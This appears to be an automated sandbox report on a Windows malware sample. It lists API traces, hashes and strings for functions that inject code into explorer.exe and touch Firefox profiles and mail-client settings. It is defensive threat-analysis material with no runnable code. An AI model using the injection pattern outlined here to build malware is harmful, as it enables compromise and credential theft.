Function_00001416 API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen, String ID: , Total Matches: 50
Function_0000973F API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf, String ID: , Total Matches: 50
Function_0000064D API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf, String ID: , Total Matches: 49
Function_00008BEF API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap, String ID: W, Total Matches: 48
Function_0000A4E6 API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep, String ID: , Total Matches: 46
Function_000019BF API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen, String ID: %APPDATA%\Microsoft\, Total Matches: 45
Function_00004816 API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy, String ID: , Total Matches: 43
Function_00001A39 API ID: HeapFree$CloseHandleRtlImageNtHeader, String ID: [FILE]$[FILE], Total Matches: 43
Function_00016471 API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy, String ID: , Total Matches: 43
Function_00000586 API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf, String ID: , Total Matches: 43
Function_00006664 API ID: HeapFree$GetLastErrorRtlAllocateHeap, String ID: , Total Matches: 40
Function_00009F14 API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf, String ID: , Total Matches: 40
Function_00000CB2 API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset, String ID: pnls, Total Matches: 38
Function_00002D4D API ID: RegCloseKeyRegQueryValueExwsprintf, String ID: Client, Total Matches: 38
Function_00000CB2 API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset, String ID: pnls, Total Matches: 38
Function_000037EC API ID: HeapFreememcpy, String ID: ($Client, Total Matches: 38
Function_0001E422 API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey, String ID: , Total Matches: 37
Function_0001D6E9 API ID: GetLastErrorGetVersion, String ID: GET$POST, Total Matches: 37
Function_00002F95 API ID: HeapFree$RtlAllocateHeaplstrcmpi, String ID: Main, Total Matches: 37
Function_0000CA13 API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen, String ID: , Total Matches: 36
Function_00015996 API ID: FlushFileBuffersGetLastErrormemset, String ID: K$P, Total Matches: 35
Function_00000E86 API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy, String ID: , Total Matches: 34
Function_0000332F API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy, String ID: pnls$}nls, Total Matches: 33
Function_0000332F API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy, String ID: pnls$}nls, Total Matches: 33
Function_00003CEB API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs, String ID: , Total Matches: 33
Function_0000C171 API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects, String ID: , Total Matches: 31
Function_00000B85 API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy, String ID: \sols, Total Matches: 31
Function_000004CA API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary, String ID: USER32.DLL$pnls$pnls, Total Matches: 29
Function_000004CA API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary, String ID: USER32.DLL$pnls$pnls, Total Matches: 29
Function_00005604 API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy, String ID: , Total Matches: 29
Function_000049D7 API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 27
Function_00004C23 API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: Main, Total Matches: 27
Function_000041AB API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf, String ID: Main, Total Matches: 26
Function_0000A410 API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle, String ID: , Total Matches: 26
Function_00004B7B API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy, String ID: , Total Matches: 25
Function_00000F61 API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy, String ID: , Total Matches: 25
Function_0001E75B API ID: LocalFreelstrcatlstrcpymemcpy, String ID: IMAP$P$POP3$SMTP, Total Matches: 23
Function_000003D6 API ID: CloseHandleHeapDestroySetEvent, String ID: , Total Matches: 21
Function_00000395 API ID: GetLastErrorHeapFreememset, String ID: D, Total Matches: 21
Function_00005C08 API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject, String ID: %APPDATA%\Mozilla\Firefox\Profiles, Total Matches: 19
Function_00002C8B API ID: GetModuleFileName$GetLastError, String ID: , Total Matches: 12
Function_0000044C API ID: HeapFreeStrStrI, String ID: pnls, Total Matches: 9
Function_00006422 API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs, String ID: D$cmd /C "%s> %s1", Total Matches: 8
Function_00016A61 API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 6
Function_00003003 API ID: VirtualAllocVirtualFreelstrcpynmemcpy, String ID: Apr 14 2018$pnls$pnls, Total Matches: 5
Function_00003003 API ID: VirtualAllocVirtualFreelstrcpynmemcpy, String ID: Apr 14 2018$pnls$pnls, Total Matches: 5
Function_000016C0 API ID: HeapFreeRtlAllocateHeaplstrcpylstrlen, String ID: W, Total Matches: 4
Function_0000C890 API ID: HeapFreeLocalFreeReleaseMutexRtlRemoveVectoredExceptionHandlerSleepEx, String ID: , Total Matches: 3
Function_00000535 API ID: RtlFreeAnsiStringRtlUpcaseUnicodeString, String ID: pnls, Total Matches: 2
Function_00000535 API ID: RtlFreeAnsiStringRtlUpcaseUnicodeString, String ID: pnls, Total Matches: 2
Function_00000000 API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeapWriteFilelstrcpy, String ID: qwerty, Total Matches: 1
Function_0001D8D2 API ID: GetLastErrorlstrlenwsprintf, String ID: `, Total Matches: 1
Function_0001CB79 API ID: HeapFree$GetTickCountRtlAllocateHeap$QueryPerformanceCounterQueryPerformanceFrequencyRtlEnterCriticalSectionRtlLeaveCriticalSectionStrTrim_aulldivlstrcpy, String ID: , Total Matches: 1
Function_0000C519 API ID: GetLastErrorRtlAllocateHeap$CloseHandle$CreateMutexLoadLibraryNtQueryInformationProcessOpenProcessmemsetwsprintf, String ID: , Total Matches: 1
Function_0001CE6F API ID: HeapFree$lstrcat$RtlAllocateHeap$StrTrimlstrcpy, String ID: , Total Matches: 1
Function_0000A7D1 API ID: RtlAllocateHeap$GetLastErrorRtlInitializeCriticalSection, String ID: , Total Matches: 1

Process Name: explorer.exe Analysis ID: 44237

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	6DDCA324434FFA506CF7DC4E51DB7935
Total matches:	79
Initial Analysis Report:	Open
Initial sample Analysis ID:	44237
Initial sample SHA 256:	7AD80E267DEB4DCF858EE8112690CA6EE13D49233F47DAFEB2D7D331DC6D22ED
Initial sample name:	0.exe

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime

Similarity

Total matches: 33
API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
String ID: pnls$}nls
API String ID: 315724681-4252118926
Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
CloseHandle.KERNEL32(?), ref: 002E43F8
StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
FindNextFileA.KERNELBASE(?,?), ref: 002E4486
StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
FindNextFileA.KERNELBASE(?,?), ref: 002E4542
CompareFileTime.KERNEL32(?,?), ref: 002E456B
HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1

Strings

pnls, xrefs: 002E4340, 002E4351, 002E4367, 002E4373, 002E438B, 002E4393
}nls, xrefs: 002E436C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native

Similarity

Total matches: 38
API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
String ID: pnls
API String ID: 82859500-141991303
Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714

APIs

Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F

memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F

Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04

memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F

Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4

Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4

NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
CloseHandle.KERNEL32(00000000), ref: 002E1EE0
memset.NTDLL ref: 002E1EF4

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

Strings

pnls, xrefs: 002E1D8C

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader

Similarity

Total matches: 223
API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
String ID:
API String ID: 2525968537-0
Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393

APIs

GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
CloseHandle.KERNEL32(002E74A4), ref: 002E3331

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file

Similarity

Total matches: 385
API ID: CloseHandleCreateFileReadFileSetFilePointer
String ID:
API String ID: 3466452087-0
Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722

APIs

Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7

Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
CloseHandle.KERNEL32(?), ref: 002E3400

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime

Similarity

Total matches: 218
API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
String ID:
API String ID: 1809591024-0
Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9

APIs

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
lstrcpy.KERNEL32(00000000), ref: 002E4BE0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 87024.exe Analysis ID: 56552

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	1714CF2647A549D0D7529223ACF0FC97
Total matches:	61
Initial Analysis Report:	Open
Initial sample Analysis ID:	56552
Initial sample SHA 256:	C28329422090F74BA76A9BFDB7B0F1E578A5B83DB0CBED2D6BC365D968EF4652
Initial sample name:	Healthy_Women_Inquiry.doc

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
